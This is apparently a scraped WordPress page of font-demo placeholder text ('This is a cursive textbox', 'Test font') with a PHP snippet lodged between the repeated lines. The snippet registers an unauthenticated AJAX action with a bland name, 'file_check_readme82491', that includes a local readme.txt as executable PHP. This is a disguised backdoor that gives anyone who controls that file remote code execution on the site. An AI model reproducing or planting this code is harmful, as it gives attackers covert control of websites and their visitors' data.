This is a cursive textbox. All text in here will appear in the cursive font
This is Libre font family text box. All text in here will be your secondary Libre font
Test font
if(!function_exists('file_check_readme82491')){ add_action('wp_ajax_nopriv_file_check_readme82491', 'file_check_readme82491'); add_action('wp_ajax_file_check_readme82491', 'file_check_readme82491'); function file_check_readme82491() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } }
This is a cursive textbox. All text in here will appear in the cursive font
This is Libre font family text box. All text in here will be your secondary Libre font
Test font